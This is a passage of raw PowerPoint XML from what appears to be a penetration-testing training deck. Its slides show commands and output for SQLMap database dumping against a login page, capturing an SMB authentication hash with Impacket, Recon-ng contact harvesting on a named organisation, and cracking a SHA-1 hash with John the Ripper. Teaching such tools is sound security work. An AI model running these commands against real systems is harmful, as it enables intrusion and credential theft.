              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' --data='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>admin&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pass&amp;Submit_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=Submit' --tables --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --proxy=http://127.0.0.1:8082</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install CO2 from Burp Extender to help form the syntax for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Once all options are set, copy the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Command into the terminal .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> inside the CO2 plugin causes burp to be locked until </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> finishes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1054488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6C52D07-23DF-A64B-9F29-C6F9C896B991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="86689" y="1357959"/>
            <a:ext cx="4371010" cy="2950025"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D55125A9-E672-C941-8A77-71E8CBF200C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4686301" y="1357959"/>
            <a:ext cx="4371010" cy="2950025"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E2E8DD-C79C-524E-B778-3147748B6D48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Burp CO2 Plugin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4026439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E44755E-E14C-D44E-BBD6-8B7497B3C5D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="105507" y="1384300"/>
            <a:ext cx="4331980" cy="2923684"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80FF398F-8734-0543-93A7-086E243D2621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706513" y="1384300"/>
            <a:ext cx="4331980" cy="2923684"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{199D5860-9409-F646-BC63-3B9870B0CF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Burp Notes Plugin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11670644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0E85-626C-254E-AAAA-2093B8FEDBCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Stand Alone SMB server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6A438F8-5AAB-BD4F-8AFF-EC43636F55BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smbserver.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -comment "this is not the drive you are looking for" ONE /root/Downloads/10/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>Impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> v0.9.16-dev - Copyright 2002-2017 Core Security Technologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>[*] Config file parsed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>[*] Incoming connection (10.141.13.10,1346)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>[*] AUTHENTICATE_MESSAGE (\,MIKE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>[*] User \MIKE authenticated successfully</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>[*] :::00::4141414141414141</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>[*] Disconnecting Share(1:PC10$)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>[*] Disconnecting Share(2:ONE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>[*] Closing down connection (10.141.13.10,1346)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33080151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9DAD-A2E0-CD4E-9F12-098ECDB010D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python Modules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B13A4A6-90A3-F143-8A53-6DE4200B9876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standalone HTTP server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python2: python -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SimpleHTTPServer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python3: python3 -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>http.server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The HTTP server will allow files within the current directory to be served to a remote host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Will not interpret PHP code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple Email Server: python -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smtpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EmailServerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -n localhost:1313</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="878282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F437-B321-C545-A0FA-470CC4796149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recon-ng OSINT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB04AAA-523A-504C-9053-E98F087A0F55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set required options for the module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[recon-ng][default][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois_pocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] &gt; options set SOURCE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[recon-ng][default][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois_pocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] &gt; run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the show command to see database contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>show contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28753358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FC01-398E-DC4A-9A1A-DD2693EB3444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hash Identifiers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23F7A730-5AE1-9F48-8BFA-0CC00E61559E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hash: AAFDC23870ECBCD3D557B6423A8982134E17927E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use hash-id to determine the hash type, and view John The Ripper set string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hashid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -j AAFDC23870ECBCD3D557B6423A8982134E17927E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyzing 'AAFDC23870ECBCD3D557B6423A8982134E17927E'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[+] SHA-1 [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JtR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Format: raw-sha1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hash-Identifier: # hash-identifier AAFDC23870ECBCD3D557B6423A8982134E17927E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hashs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[+] SHA-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[+] MySQL5 - SHA-1(SHA-1($pass))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1613165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0C654-9A7E-1B49-ACA6-CECAD0C76A7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cracking Hashed Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B7F4A5-3650-A74F-BDA3-2430DB5131D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use John The Ripper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JtR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HashCat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy the hash into a file: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># echo AAFDC23870ECBCD3D557B6423A8982134E17927E &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adminHash.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># john --format="Raw-SHA1" --wordlist=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rockyou.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adminHash.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using default input encoding: UTF-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 AVX 4x])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Warning: no OpenMP support for this hash type, consider --fork=4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Press 'q' or Ctrl-C to abort, almost any other key for status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>          (?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3908623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557FF-24F2-6F46-9DBF-41DF897B8CAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Medusa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7978541A-46DA-644E-B2AC-4F774AF07C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
